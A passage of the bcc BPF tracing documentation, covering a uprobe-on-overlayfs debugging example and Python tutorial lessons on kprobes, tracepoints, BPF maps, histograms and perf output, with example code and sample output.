perf_event_open(0x7ffd968212f0, -1, 0, -1, 0x8 /* PERF_FLAG_??? */) = -1 EIO (Input/output error)
|
||
...
|
||
</code></pre>
|
||
<p>The <code>perf_event_open</code> syscall returns <code>-EIO</code>. Digging into kernel uprobe related codes in <code>/kernel/trace</code> and <code>/kernel/events</code> directories to search <code>EIO</code>, the function <code>uprobe_register</code> is the most suspicious. Let us find whether this function is called or not and what is the return value if it is called. In one terminal using the following command to print out the return value of uprobe_register,</p>
|
||
<pre><code class="language-sh">$ trace.py 'r::uprobe_register "ret = %d", retval'
|
||
</code></pre>
|
||
<p>In another terminal run the same bash uretprobe tracing example, and you should get</p>
|
||
<pre><code class="language-sh">$ trace.py 'r::uprobe_register "ret = %d", retval'
|
||
PID TID COMM FUNC -
|
||
1041401 1041401 python2.7 uprobe_register ret = -5
|
||
</code></pre>
|
||
<p>The <code>-5</code> error code is EIO. This confirms that the following code in function <code>uprobe_register</code> is the most suspicious culprit.</p>
|
||
<pre><code class="language-c"> if (!inode->i_mapping->a_ops->readpage && !shmem_mapping(inode->i_mapping))
|
||
return -EIO;
|
||
</code></pre>
|
||
<p>The <code>shmem_mapping</code> function is defined as</p>
|
||
<pre><code class="language-c">bool shmem_mapping(struct address_space *mapping)
|
||
{
|
||
return mapping->a_ops == &shmem_aops;
|
||
}
|
||
</code></pre>
|
||
<p>To confirm the theory, find what is <code>inode->i_mapping->a_ops</code> with the following command</p>
|
||
<pre><code class="language-sh">$ trace.py -I 'linux/fs.h' 'p::uprobe_register(struct inode *inode) "a_ops = %llx", inode->i_mapping->a_ops'
|
||
PID TID COMM FUNC -
|
||
814288 814288 python2.7 uprobe_register a_ops = ffffffff81a2adc0
|
||
^C$ grep ffffffff81a2adc0 /proc/kallsyms
|
||
ffffffff81a2adc0 R empty_aops
|
||
</code></pre>
|
||
<p>The kernel symbol <code>empty_aops</code> does not have <code>readpage</code> defined and hence the above suspicious condition is true. Further examining the kernel source code shows that <code>overlayfs</code> does not provide its own <code>a_ops</code> while some other file systems (e.g., ext4) define their own <code>a_ops</code> (e.g., <code>ext4_da_aops</code>), and <code>ext4_da_aops</code> defines <code>readpage</code>. Hence, uprobe works fine on ext4 while not on overlayfs.</p>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/trace_example.txt">examples</a>.</p>
|
||
<h4 id="22-argdist"><a class="header" href="#22-argdist">2.2. argdist</a></h4>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/argdist_example.txt">examples</a>.</p>
|
||
<h4 id="23-funccount"><a class="header" href="#23-funccount">2.3. funccount</a></h4>
|
||
<p>More <a href="https://github.com/iovisor/bcc/tree/master/tools/funccount_example.txt">examples</a>.</p>
|
||
<h2 id="networking"><a class="header" href="#networking">Networking</a></h2>
|
||
<p>To do.</p>
|
||
<div style="break-before: page; page-break-before: always;"></div><h1 id="bcc-python-developer-tutorial"><a class="header" href="#bcc-python-developer-tutorial">bcc Python Developer Tutorial</a></h1>
|
||
<p>This tutorial is about developing <a href="https://github.com/iovisor/bcc">bcc</a> tools and programs using the Python interface. There are two parts: observability then networking. Snippets are taken from various programs in bcc: see their files for licences.</p>
|
||
<p>Also see the bcc developer's <a href="bcc-documents/reference_guide.html">reference_guide.md</a>, and a tutorial for end-users of tools: <a href="bcc-documents/tutorial.html">tutorial.md</a>. There is also a lua interface for bcc.</p>
|
||
<h2 id="observability-1"><a class="header" href="#observability-1">Observability</a></h2>
|
||
<p>This observability tutorial contains 17 lessons, and 46 enumerated things to learn.</p>
|
||
<h3 id="lesson-1-hello-world"><a class="header" href="#lesson-1-hello-world">Lesson 1. Hello World</a></h3>
|
||
<p>Start by running <a href="https://github.com/iovisor/bcc/tree/master/examples/hello_world.py">examples/hello_world.py</a>, while running some commands (eg, "ls") in another session. It should print "Hello, World!" for new processes. If not, start by fixing bcc: see <a href="https://github.com/iovisor/bcc/tree/master/INSTALL.md">INSTALL.md</a>.</p>
|
||
<pre><code class="language-sh"># ./examples/hello_world.py
|
||
bash-13364 [002] d... 24573433.052937: : Hello, World!
|
||
bash-13364 [003] d... 24573436.642808: : Hello, World!
|
||
[...]
|
||
</code></pre>
|
||
<p>Here's the code for hello_world.py:</p>
|
||
<pre><code class="language-Python">from bcc import BPF
|
||
BPF(text='int kprobe__sys_clone(void *ctx) { bpf_trace_printk("Hello, World!\\n"); return 0; }').trace_print()
|
||
</code></pre>
|
||
<p>There are six things to learn from this:</p>
|
||
<ol>
|
||
<li>
|
||
<p><code>text='...'</code>: This defines a BPF program inline. The program is written in C.</p>
|
||
</li>
|
||
<li>
|
||
<p><code>kprobe__sys_clone()</code>: This is a short-cut for kernel dynamic tracing via kprobes. If the C function begins with <code>kprobe__</code>, the rest is treated as a kernel function name to instrument, in this case, <code>sys_clone()</code>.</p>
|
||
</li>
|
||
<li>
|
||
<p><code>void *ctx</code>: ctx has arguments, but since we aren't using them here, we'll just cast it to <code>void *</code>.</p>
|
||
</li>
|
||
<li>
|
||
<p><code>bpf_trace_printk()</code>: A simple kernel facility for printf() to the common trace_pipe (/sys/kernel/debug/tracing/trace_pipe). This is ok for some quick examples, but has limitations: 3 args max, 1 %s only, and trace_pipe is globally shared, so concurrent programs will have clashing output. A better interface is via BPF_PERF_OUTPUT(), covered later.</p>
|
||
</li>
|
||
<li>
|
||
<p><code>return 0;</code>: Necessary formality (if you want to know why, see <a href="https://github.com/iovisor/bcc/issues/139">#139</a>).</p>
|
||
</li>
|
||
<li>
|
||
<p><code>.trace_print()</code>: A bcc routine that reads trace_pipe and prints the output.</p>
|
||
</li>
|
||
</ol>
|
||
<h3 id="lesson-2-sys_sync"><a class="header" href="#lesson-2-sys_sync">Lesson 2. sys_sync()</a></h3>
|
||
<p>Write a program that traces the sys_sync() kernel function. Print "sys_sync() called" when it runs. Test by running <code>sync</code> in another session while tracing. The hello_world.py program has everything you need for this.</p>
|
||
<p>Improve it by printing "Tracing sys_sync()... Ctrl-C to end." when the program first starts. Hint: it's just Python.</p>
|
||
<h3 id="lesson-3-hello_fieldspy"><a class="header" href="#lesson-3-hello_fieldspy">Lesson 3. hello_fields.py</a></h3>
|
||
<p>This program is in <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/hello_fields.py">examples/tracing/hello_fields.py</a>. Sample output (run commands in another session):</p>
|
||
<pre><code class="language-sh"># examples/tracing/hello_fields.py
|
||
TIME(s) COMM PID MESSAGE
|
||
24585001.174885999 sshd 1432 Hello, World!
|
||
24585001.195710000 sshd 15780 Hello, World!
|
||
24585001.991976000 systemd-udevd 484 Hello, World!
|
||
24585002.276147000 bash 15787 Hello, World!
|
||
</code></pre>
|
||
<p>Code:</p>
|
||
<pre><code class="language-Python">from bcc import BPF
|
||
|
||
# define BPF program
|
||
prog = """
|
||
int hello(void *ctx) {
|
||
bpf_trace_printk("Hello, World!\\n");
|
||
return 0;
|
||
}
|
||
"""
|
||
|
||
# load BPF program
|
||
b = BPF(text=prog)
|
||
b.attach_kprobe(event=b.get_syscall_fnname("clone"), fn_name="hello")
|
||
|
||
# header
|
||
print("%-18s %-16s %-6s %s" % ("TIME(s)", "COMM", "PID", "MESSAGE"))
|
||
|
||
# format output
|
||
while 1:
|
||
try:
|
||
(task, pid, cpu, flags, ts, msg) = b.trace_fields()
|
||
except ValueError:
|
||
continue
|
||
print("%-18.9f %-16s %-6d %s" % (ts, task, pid, msg))
|
||
</code></pre>
|
||
<p>This is similar to hello_world.py, and traces new processes via sys_clone() again, but has a few more things to learn:</p>
|
||
<ol>
|
||
<li>
|
||
<p><code>prog =</code>: This time we declare the C program as a variable, and later refer to it. This is useful if you want to add some string substitutions based on command line arguments.</p>
|
||
</li>
|
||
<li>
|
||
<p><code>hello()</code>: Now we're just declaring a C function, instead of the <code>kprobe__</code> shortcut. We'll refer to this later. All C functions declared in the BPF program are expected to be executed on a probe, hence they all need to take a <code>pt_reg* ctx</code> as first argument. If you need to define some helper function that will not be executed on a probe, they need to be defined as <code>static inline</code> in order to be inlined by the compiler. Sometimes you would also need to add <code>_always_inline</code> function attribute to it.</p>
|
||
</li>
|
||
<li>
|
||
<p><code>b.attach_kprobe(event=b.get_syscall_fnname("clone"), fn_name="hello")</code>: Creates a kprobe for the kernel clone system call function, which will execute our defined hello() function. You can call attach_kprobe() more than once, and attach your C function to multiple kernel functions.</p>
|
||
</li>
|
||
<li>
|
||
<p><code>b.trace_fields()</code>: Returns a fixed set of fields from trace_pipe. Similar to trace_print(), this is handy for hacking, but for real tooling we should switch to BPF_PERF_OUTPUT().</p>
|
||
</li>
|
||
</ol>
|
||
<h3 id="lesson-4-sync_timingpy"><a class="header" href="#lesson-4-sync_timingpy">Lesson 4. sync_timing.py</a></h3>
|
||
<p>Remember the days of sysadmins typing <code>sync</code> three times on a slow console before <code>reboot</code>, to give the first asynchronous sync time to complete? Then someone thought <code>sync;sync;sync</code> was clever, to run them all on one line, which became industry practice despite defeating the original purpose! And then sync became synchronous, so more reasons it was silly. Anyway.</p>
|
||
<p>The following example times how quickly the <code>do_sync</code> function is called, and prints output if it has been called more recently than one second ago. A <code>sync;sync;sync</code> will print output for the 2nd and 3rd sync's:</p>
|
||
<pre><code class="language-sh"># examples/tracing/sync_timing.py
|
||
Tracing for quick sync's... Ctrl-C to end
|
||
At time 0.00 s: multiple syncs detected, last 95 ms ago
|
||
At time 0.10 s: multiple syncs detected, last 96 ms ago
|
||
</code></pre>
|
||
<p>This program is <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/sync_timing.py">examples/tracing/sync_timing.py</a>:</p>
|
||
<pre><code class="language-Python">from __future__ import print_function
|
||
from bcc import BPF
|
||
|
||
# load BPF program
|
||
b = BPF(text="""
|
||
#include <uapi/linux/ptrace.h>
|
||
|
||
BPF_HASH(last);
|
||
|
||
int do_trace(struct pt_regs *ctx) {
|
||
u64 ts, *tsp, delta, key = 0;
|
||
|
||
// attempt to read stored timestamp
|
||
tsp = last.lookup(&key);
|
||
if (tsp != NULL) {
|
||
delta = bpf_ktime_get_ns() - *tsp;
|
||
if (delta < 1000000000) {
|
||
// output if time is less than 1 second
|
||
bpf_trace_printk("%d\\n", delta / 1000000);
|
||
}
|
||
last.delete(&key);
|
||
}
|
||
|
||
// update stored timestamp
|
||
ts = bpf_ktime_get_ns();
|
||
last.update(&key, &ts);
|
||
return 0;
|
||
}
|
||
""")
|
||
|
||
b.attach_kprobe(event=b.get_syscall_fnname("sync"), fn_name="do_trace")
|
||
print("Tracing for quick sync's... Ctrl-C to end")
|
||
|
||
# format output
|
||
start = 0
|
||
while 1:
|
||
(task, pid, cpu, flags, ts, ms) = b.trace_fields()
|
||
if start == 0:
|
||
start = ts
|
||
ts = ts - start
|
||
print("At time %.2f s: multiple syncs detected, last %s ms ago" % (ts, ms))
|
||
</code></pre>
|
||
<p>Things to learn:</p>
|
||
<ol>
|
||
<li><code>bpf_ktime_get_ns()</code>: Returns the time as nanoseconds.</li>
|
||
<li><code>BPF_HASH(last)</code>: Creates a BPF map object that is a hash (associative array), called "last". We didn't specify any further arguments, so it defaults to key and value types of u64.</li>
|
||
<li><code>key = 0</code>: We'll only store one key/value pair in this hash, where the key is hardwired to zero.</li>
|
||
<li><code>last.lookup(&key)</code>: Lookup the key in the hash, and return a pointer to its value if it exists, else NULL. We pass the key in as an address to a pointer.</li>
|
||
<li><code>if (tsp != NULL) {</code>: The verifier requires that pointer values derived from a map lookup must be checked for a null value before they can be dereferenced and used.</li>
|
||
<li><code>last.delete(&key)</code>: Delete the key from the hash. This is currently required because of <a href="https://git.kernel.org/cgit/linux/kernel/git/davem/net.git/commit/?id=a6ed3ea65d9868fdf9eff84e6fe4f666b8d14b02">a kernel bug in <code>.update()</code></a> (fixed in 4.8.10).</li>
|
||
<li><code>last.update(&key, &ts)</code>: Associate the value in the 2nd argument to the key, overwriting any previous value. This records the timestamp.</li>
|
||
</ol>
|
||
<h3 id="lesson-5-sync_countpy"><a class="header" href="#lesson-5-sync_countpy">Lesson 5. sync_count.py</a></h3>
|
||
<p>Modify the sync_timing.py program (prior lesson) to store the count of all kernel sync system calls (both fast and slow), and print it with the output. This count can be recorded in the BPF program by adding a new key index to the existing hash.</p>
|
||
<h3 id="lesson-6-disksnooppy"><a class="header" href="#lesson-6-disksnooppy">Lesson 6. disksnoop.py</a></h3>
|
||
<p>Browse the <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/disksnoop.py">examples/tracing/disksnoop.py</a> program to see what is new. Here is some sample output:</p>
|
||
<pre><code class="language-sh"># disksnoop.py
|
||
TIME(s) T BYTES LAT(ms)
|
||
16458043.436012 W 4096 3.13
|
||
16458043.437326 W 4096 4.44
|
||
16458044.126545 R 4096 42.82
|
||
16458044.129872 R 4096 3.24
|
||
[...]
|
||
</code></pre>
|
||
<p>And a code snippet:</p>
|
||
<pre><code class="language-Python">[...]
|
||
REQ_WRITE = 1 # from include/linux/blk_types.h
|
||
|
||
# load BPF program
|
||
b = BPF(text="""
|
||
#include <uapi/linux/ptrace.h>
|
||
#include <linux/blk-mq.h>
|
||
|
||
BPF_HASH(start, struct request *);
|
||
|
||
void trace_start(struct pt_regs *ctx, struct request *req) {
|
||
// stash start timestamp by request ptr
|
||
u64 ts = bpf_ktime_get_ns();
|
||
|
||
start.update(&req, &ts);
|
||
}
|
||
|
||
void trace_completion(struct pt_regs *ctx, struct request *req) {
|
||
u64 *tsp, delta;
|
||
|
||
tsp = start.lookup(&req);
|
||
if (tsp != 0) {
|
||
delta = bpf_ktime_get_ns() - *tsp;
|
||
bpf_trace_printk("%d %x %d\\n", req->__data_len,
|
||
req->cmd_flags, delta / 1000);
|
||
start.delete(&req);
|
||
}
|
||
}
|
||
""")
|
||
if BPF.get_kprobe_functions(b'blk_start_request'):
|
||
b.attach_kprobe(event="blk_start_request", fn_name="trace_start")
|
||
b.attach_kprobe(event="blk_mq_start_request", fn_name="trace_start")
|
||
if BPF.get_kprobe_functions(b'__blk_account_io_done'):
|
||
b.attach_kprobe(event="__blk_account_io_done", fn_name="trace_completion")
|
||
else:
|
||
b.attach_kprobe(event="blk_account_io_done", fn_name="trace_completion")
|
||
[...]
|
||
</code></pre>
|
||
<p>Things to learn:</p>
|
||
<ol>
|
||
<li><code>REQ_WRITE</code>: We're defining a kernel constant in the Python program because we'll use it there later. If we were using REQ_WRITE in the BPF program, it should just work (without needing to be defined) with the appropriate #includes.</li>
|
||
<li><code>trace_start(struct pt_regs *ctx, struct request *req)</code>: This function will later be attached to kprobes. The arguments to kprobe functions are <code>struct pt_regs *ctx</code>, for registers and BPF context, and then the actual arguments to the function. We'll attach this to blk_start_request(), where the first argument is <code>struct request *</code>.</li>
|
||
<li><code>start.update(&req, &ts)</code>: We're using the pointer to the request struct as a key in our hash. What? This is commonplace in tracing. Pointers to structs turn out to be great keys, as they are unique: two structs can't have the same pointer address. (Just be careful about when it gets free'd and reused.) So what we're really doing is tagging the request struct, which describes the disk I/O, with our own timestamp, so that we can time it. There's two common keys used for storing timestamps: pointers to structs, and, thread IDs (for timing function entry to return).</li>
|
||
<li><code>req->__data_len</code>: We're dereferencing members of <code>struct request</code>. See its definition in the kernel source for what members are there. bcc actually rewrites these expressions to be a series of <code>bpf_probe_read_kernel()</code> calls. Sometimes bcc can't handle a complex dereference, and you need to call <code>bpf_probe_read_kernel()</code> directly.</li>
|
||
</ol>
|
||
<p>This is a pretty interesting program, and if you can understand all the code, you'll understand many important basics. We're still using the bpf_trace_printk() hack, so let's fix that next.</p>
|
||
<h3 id="lesson-7-hello_perf_outputpy"><a class="header" href="#lesson-7-hello_perf_outputpy">Lesson 7. hello_perf_output.py</a></h3>
|
||
<p>Let's finally stop using bpf_trace_printk() and use the proper BPF_PERF_OUTPUT() interface. This will also mean we stop getting the free trace_field() members like PID and timestamp, and will need to fetch them directly. Sample output while commands are run in another session:</p>
|
||
<pre><code class="language-sh"># hello_perf_output.py
|
||
TIME(s) COMM PID MESSAGE
|
||
0.000000000 bash 22986 Hello, perf_output!
|
||
0.021080275 systemd-udevd 484 Hello, perf_output!
|
||
0.021359520 systemd-udevd 484 Hello, perf_output!
|
||
0.021590610 systemd-udevd 484 Hello, perf_output!
|
||
[...]
|
||
</code></pre>
|
||
<p>Code is <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/hello_perf_output.py">examples/tracing/hello_perf_output.py</a>:</p>
|
||
<pre><code class="language-Python">from bcc import BPF
|
||
|
||
# define BPF program
|
||
prog = """
|
||
#include <linux/sched.h>
|
||
|
||
// define output data structure in C
|
||
struct data_t {
|
||
u32 pid;
|
||
u64 ts;
|
||
char comm[TASK_COMM_LEN];
|
||
};
|
||
BPF_PERF_OUTPUT(events);
|
||
|
||
int hello(struct pt_regs *ctx) {
|
||
struct data_t data = {};
|
||
|
||
data.pid = bpf_get_current_pid_tgid();
|
||
data.ts = bpf_ktime_get_ns();
|
||
bpf_get_current_comm(&data.comm, sizeof(data.comm));
|
||
|
||
events.perf_submit(ctx, &data, sizeof(data));
|
||
|
||
return 0;
|
||
}
|
||
"""
|
||
|
||
# load BPF program
|
||
b = BPF(text=prog)
|
||
b.attach_kprobe(event=b.get_syscall_fnname("clone"), fn_name="hello")
|
||
|
||
# header
|
||
print("%-18s %-16s %-6s %s" % ("TIME(s)", "COMM", "PID", "MESSAGE"))
|
||
|
||
# process event
|
||
start = 0
|
||
def print_event(cpu, data, size):
|
||
global start
|
||
event = b["events"].event(data)
|
||
if start == 0:
|
||
start = event.ts
|
||
time_s = (float(event.ts - start)) / 1000000000
|
||
print("%-18.9f %-16s %-6d %s" % (time_s, event.comm, event.pid,
|
||
"Hello, perf_output!"))
|
||
|
||
# loop with callback to print_event
|
||
b["events"].open_perf_buffer(print_event)
|
||
while 1:
|
||
b.perf_buffer_poll()
|
||
</code></pre>
|
||
<p>Things to learn:</p>
|
||
<ol>
|
||
<li><code>struct data_t</code>: This defines the C struct we'll use to pass data from kernel to user space.</li>
|
||
<li><code>BPF_PERF_OUTPUT(events)</code>: This names our output channel "events".</li>
|
||
<li><code>struct data_t data = {};</code>: Create an empty data_t struct that we'll then populate.</li>
|
||
<li><code>bpf_get_current_pid_tgid()</code>: Returns the process ID in the lower 32 bits (kernel's view of the PID, which in user space is usually presented as the thread ID), and the thread group ID in the upper 32 bits (what user space often thinks of as the PID). By directly setting this to a u32, we discard the upper 32 bits. Should you be presenting the PID or the TGID? For a multi-threaded app, the TGID will be the same, so you need the PID to differentiate them, if that's what you want. It's also a question of expectations for the end user.</li>
|
||
<li><code>bpf_get_current_comm()</code>: Populates the first argument address with the current process name.</li>
|
||
<li><code>events.perf_submit()</code>: Submit the event for user space to read via a perf ring buffer.</li>
|
||
<li><code>def print_event()</code>: Define a Python function that will handle reading events from the <code>events</code> stream.</li>
|
||
<li><code>b["events"].event(data)</code>: Now get the event as a Python object, auto-generated from the C declaration.</li>
|
||
<li><code>b["events"].open_perf_buffer(print_event)</code>: Associate the Python <code>print_event</code> function with the <code>events</code> stream.</li>
|
||
<li><code>while 1: b.perf_buffer_poll()</code>: Block waiting for events.</li>
|
||
</ol>
|
||
<h3 id="lesson-8-sync_perf_outputpy"><a class="header" href="#lesson-8-sync_perf_outputpy">Lesson 8. sync_perf_output.py</a></h3>
|
||
<p>Rewrite sync_timing.py, from a prior lesson, to use <code>BPF_PERF_OUTPUT</code>.</p>
|
||
<h3 id="lesson-9-bitehistpy"><a class="header" href="#lesson-9-bitehistpy">Lesson 9. bitehist.py</a></h3>
|
||
<p>The following tool records a histogram of disk I/O sizes. Sample output:</p>
|
||
<pre><code class="language-sh"># bitehist.py
|
||
Tracing... Hit Ctrl-C to end.
|
||
^C
|
||
kbytes : count distribution
|
||
0 -> 1 : 3 | |
|
||
2 -> 3 : 0 | |
|
||
4 -> 7 : 211 |********** |
|
||
8 -> 15 : 0 | |
|
||
16 -> 31 : 0 | |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 1 | |
|
||
128 -> 255 : 800 |**************************************|
|
||
</code></pre>
|
||
<p>Code is <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/bitehist.py">examples/tracing/bitehist.py</a>:</p>
|
||
<pre><code class="language-Python">from __future__ import print_function
|
||
from bcc import BPF
|
||
from time import sleep
|
||
|
||
# load BPF program
|
||
b = BPF(text="""
|
||
#include <uapi/linux/ptrace.h>
|
||
#include <linux/blkdev.h>
|
||
|
||
BPF_HISTOGRAM(dist);
|
||
|
||
int kprobe__blk_account_io_done(struct pt_regs *ctx, struct request *req)
|
||
{
|
||
dist.increment(bpf_log2l(req->__data_len / 1024));
|
||
return 0;
|
||
}
|
||
""")
|
||
|
||
# header
|
||
print("Tracing... Hit Ctrl-C to end.")
|
||
|
||
# trace until Ctrl-C
|
||
try:
|
||
sleep(99999999)
|
||
except KeyboardInterrupt:
|
||
print()
|
||
|
||
# output
|
||
b["dist"].print_log2_hist("kbytes")
|
||
</code></pre>
|
||
<p>A recap from earlier lessons:</p>
|
||
<ul>
|
||
<li><code>kprobe__</code>: This prefix means the rest will be treated as a kernel function name that will be instrumented using kprobe.</li>
|
||
<li><code>struct pt_regs *ctx, struct request *req</code>: Arguments to kprobe. The <code>ctx</code> is registers and BPF context, the <code>req</code> is the first argument to the instrumented function: <code>blk_account_io_done()</code>.</li>
|
||
<li><code>req->__data_len</code>: Dereferencing that member.</li>
|
||
</ul>
|
||
<p>New things to learn:</p>
|
||
<ol>
|
||
<li><code>BPF_HISTOGRAM(dist)</code>: Defines a BPF map object that is a histogram, and names it "dist".</li>
|
||
<li><code>dist.increment()</code>: Increments the histogram bucket index provided as first argument by one by default. Optionally, custom increments can be passed as the second argument.</li>
|
||
<li><code>bpf_log2l()</code>: Returns the log-2 of the provided value. This becomes the index of our histogram, so that we're constructing a power-of-2 histogram.</li>
|
||
<li><code>b["dist"].print_log2_hist("kbytes")</code>: Prints the "dist" histogram as power-of-2, with a column header of "kbytes". The only data transferred from kernel to user space is the bucket counts, making this efficient.</li>
|
||
</ol>
|
||
<h3 id="lesson-10-disklatencypy"><a class="header" href="#lesson-10-disklatencypy">Lesson 10. disklatency.py</a></h3>
|
||
<p>Write a program that times disk I/O, and prints a histogram of their latency. Disk I/O instrumentation and timing can be found in the disksnoop.py program from a prior lesson, and histogram code can be found in bitehist.py from a prior lesson.</p>
|
||
<h3 id="lesson-11-vfsreadlatpy"><a class="header" href="#lesson-11-vfsreadlatpy">Lesson 11. vfsreadlat.py</a></h3>
|
||
<p>This example is split into separate Python and C files. Example output:</p>
|
||
<pre><code class="language-sh"># vfsreadlat.py 1
|
||
Tracing... Hit Ctrl-C to end.
|
||
usecs : count distribution
|
||
0 -> 1 : 0 | |
|
||
2 -> 3 : 2 |*********** |
|
||
4 -> 7 : 7 |****************************************|
|
||
8 -> 15 : 4 |********************** |
|
||
|
||
usecs : count distribution
|
||
0 -> 1 : 29 |****************************************|
|
||
2 -> 3 : 28 |************************************** |
|
||
4 -> 7 : 4 |***** |
|
||
8 -> 15 : 8 |*********** |
|
||
16 -> 31 : 0 | |
|
||
32 -> 63 : 0 | |
|
||
64 -> 127 : 0 | |
|
||
128 -> 255 : 0 | |
|
||
256 -> 511 : 2 |** |
|
||
512 -> 1023 : 0 | |
|
||
1024 -> 2047 : 0 | |
|
||
2048 -> 4095 : 0 | |
|
||
4096 -> 8191 : 4 |***** |
|
||
8192 -> 16383 : 6 |******** |
|
||
16384 -> 32767 : 9 |************ |
|
||
32768 -> 65535 : 6 |******** |
|
||
65536 -> 131071 : 2 |** |
|
||
|
||
usecs : count distribution
|
||
0 -> 1 : 11 |****************************************|
|
||
2 -> 3 : 2 |******* |
|
||
4 -> 7 : 10 |************************************ |
|
||
8 -> 15 : 8 |***************************** |
|
||
16 -> 31 : 1 |*** |
|
||
32 -> 63 : 2 |******* |
|
||
[...]
|
||
</code></pre>
|
||
<p>Browse the code in <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/vfsreadlat.py">examples/tracing/vfsreadlat.py</a> and <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/vfsreadlat.c">examples/tracing/vfsreadlat.c</a>. Things to learn:</p>
|
||
<ol>
|
||
<li><code>b = BPF(src_file = "vfsreadlat.c")</code>: Read the BPF C program from a separate source file.</li>
|
||
<li><code>b.attach_kretprobe(event="vfs_read", fn_name="do_return")</code>: Attaches the BPF C function <code>do_return()</code> to the return of the kernel function <code>vfs_read()</code>. This is a kretprobe: instrumenting the return from a function, rather than its entry.</li>
|
||
<li><code>b["dist"].clear()</code>: Clears the histogram.</li>
|
||
</ol>
|
||
<h3 id="lesson-12-urandomreadpy"><a class="header" href="#lesson-12-urandomreadpy">Lesson 12. urandomread.py</a></h3>
|
||
<p>Tracing while a <code>dd if=/dev/urandom of=/dev/null bs=8k count=5</code> is run:</p>
|
||
<pre><code class="language-sh"># urandomread.py
|
||
TIME(s) COMM PID GOTBITS
|
||
24652832.956994001 smtp 24690 384
|
||
24652837.726500999 dd 24692 65536
|
||
24652837.727111001 dd 24692 65536
|
||
24652837.727703001 dd 24692 65536
|
||
24652837.728294998 dd 24692 65536
|
||
24652837.728888001 dd 24692 65536
|
||
</code></pre>
|
||
<p>Hah! I caught smtp by accident. Code is <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/urandomread.py">examples/tracing/urandomread.py</a>:</p>
|
||
<pre><code class="language-Python">from __future__ import print_function
|
||
from bcc import BPF
|
||
|
||
# load BPF program
|
||
b = BPF(text="""
|
||
TRACEPOINT_PROBE(random, urandom_read) {
|
||
// args is from /sys/kernel/debug/tracing/events/random/urandom_read/format
|
||
bpf_trace_printk("%d\\n", args->got_bits);
|
||
return 0;
|
||
}
|
||
""")
|
||
|
||
# header
|
||
print("%-18s %-16s %-6s %s" % ("TIME(s)", "COMM", "PID", "GOTBITS"))
|
||
|
||
# format output
|
||
while 1:
|
||
try:
|
||
(task, pid, cpu, flags, ts, msg) = b.trace_fields()
|
||
except ValueError:
|
||
continue
|
||
print("%-18.9f %-16s %-6d %s" % (ts, task, pid, msg))
|
||
</code></pre>
|
||
<p>Things to learn:</p>
|
||
<ol>
|
||
<li><code>TRACEPOINT_PROBE(random, urandom_read)</code>: Instrument the kernel tracepoint <code>random:urandom_read</code>. These have a stable API, and thus are recommend to use instead of kprobes, wherever possible. You can run <code>perf list</code> for a list of tracepoints. Linux >= 4.7 is required to attach BPF programs to tracepoints.</li>
|
||
<li><code>args->got_bits</code>: <code>args</code> is auto-populated to be a structure of the tracepoint arguments. The comment above says where you can see that structure. Eg:</li>
|
||
</ol>
|
||
<pre><code class="language-sh"># cat /sys/kernel/debug/tracing/events/random/urandom_read/format
|
||
name: urandom_read
|
||
ID: 972
|
||
format:
|
||
field:unsigned short common_type; offset:0; size:2; signed:0;
|
||
field:unsigned char common_flags; offset:2; size:1; signed:0;
|
||
field:unsigned char common_preempt_count; offset:3; size:1; signed:0;
|
||
field:int common_pid; offset:4; size:4; signed:1;
|
||
|
||
field:int got_bits; offset:8; size:4; signed:1;
|
||
field:int pool_left; offset:12; size:4; signed:1;
|
||
field:int input_left; offset:16; size:4; signed:1;
|
||
|
||
print fmt: "got_bits %d nonblocking_pool_entropy_left %d input_entropy_left %d", REC->got_bits, REC->pool_left, REC->input_left
|
||
</code></pre>
|
||
<p>In this case, we were printing the <code>got_bits</code> member.</p>
|
||
<h3 id="lesson-13-disksnooppy-fixed"><a class="header" href="#lesson-13-disksnooppy-fixed">Lesson 13. disksnoop.py fixed</a></h3>
|
||
<p>Convert disksnoop.py from a previous lesson to use the <code>block:block_rq_issue</code> and <code>block:block_rq_complete</code> tracepoints.</p>
|
||
<h3 id="lesson-14-strlen_countpy"><a class="header" href="#lesson-14-strlen_countpy">Lesson 14. strlen_count.py</a></h3>
|
||
<p>This program instruments a user-level function, the <code>strlen()</code> library function, and frequency counts its string argument. Example output:</p>
|
||
<pre><code class="language-sh"># strlen_count.py
|
||
Tracing strlen()... Hit Ctrl-C to end.
|
||
^C COUNT STRING
|
||
1 " "
|
||
1 "/bin/ls"
|
||
1 "."
|
||
1 "cpudist.py.1"
|
||
1 ".bashrc"
|
||
1 "ls --color=auto"
|
||
1 "key_t"
|
||
[...]
|
||
10 "a7:~# "
|
||
10 "/root"
|
||
12 "LC_ALL"
|
||
12 "en_US.UTF-8"
|
||
13 "en_US.UTF-8"
|
||
20 "~"
|
||
70 "#%^,~:-=?+/}"
|
||
340 "\x01\x1b]0;root@bgregg-test: ~\x07\x02root@bgregg-test:~# "
|
||
</code></pre>
|
||
<p>These are various strings that are being processed by this library function while tracing, along with their frequency counts. <code>strlen()</code> was called on "LC_ALL" 12 times, for example.</p>
|
||
<p>Code is <a href="https://github.com/iovisor/bcc/tree/master/examples/tracing/strlen_count.py">examples/tracing/strlen_count.py</a>:</p>
|
||
<pre><code class="language-Python">from __future__ import print_function
|
||
from bcc import BPF
|
||
from time import sleep
|
||
|
||
# load BPF program
|
||
b = BPF(text="""
|
||
#include <uapi/linux/ptrace.h>
|
||
|
||
struct key_t {
|
||
char c[80];
|
||
};
|
||
BPF_HASH(counts, struct key_t);
|
||
|
||
int count(struct pt_regs *ctx) {
|
||
if (!PT_REGS_PARM1(ctx))
|
||
return 0;
|
||
|
||
struct key_t key = {};
|
||
u64 zero = 0, *val;
|
||
|
||
bpf_probe_read_user(&key.c, sizeof(key.c), (void *)PT_REGS_PARM1(ctx));
|
||
// could also use `counts.increment(key)`
|
||
val = counts.lookup_or_try_init(&key, &zero);
|
||
if (val) {
|
||
(*val)++;
|
||
}
|
||
return 0;
|
||
};
|
||
""")
|
||
b.attach_uprobe(name="c", sym="strlen", fn_name="count")
|
||
|
||
# header
|
||
print("Tracing strlen()... Hit Ctrl-C to end.")
|
||
|
||
